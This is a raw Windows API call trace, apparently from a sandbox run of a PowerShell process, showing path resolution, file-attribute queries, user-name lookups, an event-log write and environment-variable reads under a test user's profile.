[0081.113] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.113] SetErrorMode (uMode=0x1) returned 0x1
[0081.113] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.113] SetErrorMode (uMode=0x1) returned 0x1
[0081.113] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.113] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.113] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d070 | out: lpFileInformation=0x16d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.114] SetErrorMode (uMode=0x1) returned 0x1
[0081.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.115] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.115] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.115] SetErrorMode (uMode=0x1) returned 0x1
[0081.115] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.115] SetErrorMode (uMode=0x1) returned 0x1
[0081.115] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.115] SetErrorMode (uMode=0x1) returned 0x1
[0081.115] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.115] SetErrorMode (uMode=0x1) returned 0x1
[0081.115] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.115] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x16cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.115] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.115] SetErrorMode (uMode=0x1) returned 0x1
[0081.115] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.115] SetErrorMode (uMode=0x1) returned 0x1
[0081.116] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.116] SetErrorMode (uMode=0x1) returned 0x1
[0081.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.116] SetErrorMode (uMode=0x1) returned 0x1
[0081.116] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.116] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x16cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.116] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.116] SetErrorMode (uMode=0x1) returned 0x1
[0081.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.116] SetErrorMode (uMode=0x1) returned 0x1
[0081.116] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.116] SetErrorMode (uMode=0x1) returned 0x1
[0081.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d0b0 | out: lpFileInformation=0x16d0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.116] SetErrorMode (uMode=0x1) returned 0x1
[0081.116] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.116] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x16cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.118] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.118] SetErrorMode (uMode=0x1) returned 0x1
[0081.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d370 | out: lpFileInformation=0x16d370*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.118] SetErrorMode (uMode=0x1) returned 0x1
[0081.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.137] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0081.137] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d6d8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d6d8) returned 0x1
[0081.198] CoTaskMemFree (pv=0x1b8331c0)
[0081.198] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0081.198] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d718 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d718) returned 1
[0081.199] CoTaskMemFree (pv=0x2ba920)
[0081.199] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f2d830*="Available", lpRawData=0x2f2d5c0) returned 1
[0081.200] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.201] CoTaskMemFree (pv=0x256340)
[0081.201] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.201] CoTaskMemFree (pv=0x256340)
[0081.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.228] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.228] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="C:") returned 0x2
[0081.228] CoTaskMemFree (pv=0x256340)
[0081.228] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.228] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
[0081.228] CoTaskMemFree (pv=0x256340)
[0081.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetCurrentProcessId () returned 0x2ac
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
